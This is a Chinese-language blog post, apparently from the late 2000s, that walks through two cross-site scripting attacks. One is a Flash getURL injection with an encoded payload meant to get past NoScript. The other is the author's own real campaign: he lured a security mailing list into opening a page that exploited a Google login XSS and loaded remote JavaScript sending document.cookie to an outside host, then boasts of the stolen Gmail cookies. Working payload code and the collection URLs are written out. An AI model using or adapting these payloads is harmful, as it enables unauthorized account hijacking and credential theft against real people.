一.Owning Ha.ckers.org

　　前段时间在Sirdarckcat和Kuza55一起”Owning Ha.ckers.org”中,就是利用xss等的攻击进行渗透（没有成功,但是里面的技术细节值得学习）,具体技术细节请参考:

　　1.Sirdarckcat的 blog:http://sirdarckcat.blogspot.com/ … ing-rsnake-for.html
　　2.rSnake的blog:http://ha.ckers.org/blog/20071104/owning-hackersorg-or-not/

　　首先他们利用了以前rsnake用来测试xss的一个flash:http://ha.ckers.org/xss.swf [现在已经拒绝访问了,由于这个flash本身存在一个xss[Cross Site Flashing:请参考Stefano Di Paola的文档Testing Flash Applications],as2的代码like this:

　　getURL(“javascript:alert(’xss’)”, “_self”, “GET”);
　　stop();

　　在”Flash Lite 2.x ActionScript 语言参考”里有这样的描叙http://livedocs.adobe.com/flashlite/2_cn/main/00000160.html:

　　<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
　　getURL(url:String [, window:String [, method:String] ]) :Void
　　…..
　　method:String [可选] — 用于发送变量的 GET 或 POST 方法。如果没有变量，则省略此参数。GET 方法将变量追加到 URL 的末尾，它用于发送少量的变量。POST 方法在单独的 HTTP 标头中发送变量，它用于发送大量的变量。
　　<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

　　当我们指定第3个参数method:String 为get或者post,可以提交变量追加到url末尾,这个也就意味着getURL函数的url可以injection something :). 我们回到xss.swf

　　我们提交: xss.swf?a=0:0;eval(alert(’xss’);

　　as2里:getURL(“javascript:alert(’xss’)?a=0:0;eval(alert(’xss’);”, “_self”, “GET”);

　　注意那个?和后面都加到了url的后面,Sirdarckcat使用js的一个3元条件a=0:0;巧妙的闭和了语句.

　　demo: http://60.190.243.111/superhei/xss/xss.swf?a=0:0;eval(alert(’xss2’));

　　成功完成了xss.

　　在Sirdarckcat的poc里使用的是:

     <iframe src=” xss.swf?a=’0:0;a/**/setter=eval;b/**/setter=atob;a=b=name” xss.swf?a=”’0:0;a/**/setter=eval;b/**/setter=atob;a=b=name&quot;” ’=”” ha.ckers.org=”” http:=””>http://ha.ckers.org/xss.swf?a=0:0;a/**/setter=eval;b/**/setter=atob;a=b=name</a>;” name=”….[playload]”> </iframe>

　　这里他们认为rSnake使用ff+noscript,所以使用上面pass noscript,当然现在noscript已经修补了这个bug.

　　a=0:0;a/**/setter=eval;b/**/setter=atob;a=b=name;

　　这个也就是

　　eval(atob(window.name)).

　　atob=decode base64

　　这个又是他们的一个技巧,使用编码饶过一些检测 ..

　　他的playload好象就是利用一个csrf发了一个blog? 具体没有去看wp的代码 :).

　　在irc里我问过Sirdarckcat为什么他不用,得到cookie然后欺骗进后台,他说好象是后台可能禁止了他的ip登陆.

　　在整个过程,Sirdarckcat和Kuza55利用了n个细节来达到目的,因为他们的目标也是一位xss的牛人,比如还先利用了css来取浏览器的访问历史,来判断目标是不是进过后台[利用css的目的是no script] 等等….

　　二.Owning Some-Hacks’s Gmail

　　也是前段时间jx发现了google登陆口的一个xss: http://www.xfocus.net/articles/200711/957.html,在xf公布之前,我使用这个bug测试一下,结果我得到了国内很多搞安全的人的gmail的cookie 🙂

　　xss点:

　　https://www.google.com/accounts/ … Fui%3Dhtml%26zy%3Dl<SCRIPT>alert(’xss’)&1-=1

　　利用:经常测试发现这个是一个https的xss,在ie下使用iframe调用时得不到gmail的cookie[当然利用利用jx那文章里提到的window.location但是不够隐蔽],我们的目标是搞安全的,一般的安全意识还是有的,而且现在搞安全的一般都是使用ff,因为ie太不安全,所以我决定先只考虑ff….

　　创建iframe的代码如下:

　　  <iframe id=”f” src=””></iframe>
　　<SCRIPT>
　　foourl=’’;
　　document.getElementById(“f”).src=’https://www.google.com/accounts/ServiceLogin?service=mail&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl’;alert(document.getElementById(“f”).src);document.getElementById(“f”).style.width”>http://60.190.243.111/superhei/ieav/gm.js”>’;alert(document.getElementById(“f”).src);document.getElementById(“f”).style.width = 0;document.getElementById(“f”).style.height = 0;
　　
　　
　　
　　我的playload放在远程的一个js里:http://60.190.243.111/superhei/ieav/gm.js

　　那么怎么让目标访问呢,哈哈,这里幻影的maillist帮了我一个大忙,maillist简直都是我测试的理想场所 .

　　首先我在maillist发了一个phpcms的漏洞公告,里面的内容就是一个link:http://60.190.243.111/superhei/ieav/phpcms.htm,这里phpcms.htm里有我发现的phpcms漏洞的简单分析[由于只是测试,我没有发很引诱人的东西,如ie0day什么的,分析也写的很简单],当然也有我上面构造的xss的代码.

　　我们看看真正的playload:http://60.190.243.111/superhei/ieav/gm.js的代码:

　　getURL(“http://xxx.com/test.asp?cn=”+encodeURIComponent(document.cookie));

　　function getURL(s) {
    　　var image = new Image();
　　    image.style.width = 0;
    　　image.style.height = 0;
　　    image.src = s;
　　}

　　利用Image发送cookie.

　　然后在maillist发布我的贴以后,我就去上晚班了,等我第2天早上9:00下班后,发现我的数据库里躺着n个人的cookie 🙂

　　在整个过程,我以为我的行为会被人发现,遗憾的是一直没有人跟贴反应,只有一个朋友我们的boy同学用noscript拦截了我的攻击,说实话开始之前我对noscript一无所知,所以根本没有考虑,由此国内安全人员自己的安全意识也要加强了. 这个攻击其实没什么新东西 也没有Sirdarckcat那么的技术细节考虑但是效果还是明显的,回想起以前lis0利用xss进我163的mail时,可能也是利用了相同的伎俩?

　　三.后话

　　xss和csrf是我见过最卑鄙无耻的攻击方法,尤其是csrf[虽然上面的例子没有涉及],这个也是我一直bs它们的理由,在bs他们的同时我们应该去了解他们,因为’黑客无处不在’ 🙂

　　在国内好多人在提到xss的时候只是来个alert,真正利用还是很麻烦,而且真正用到渗透测试中更加少了…,不过我有理由相信在以后的渗透测试里,会出现更加多xss/csrf等等 攻击手段.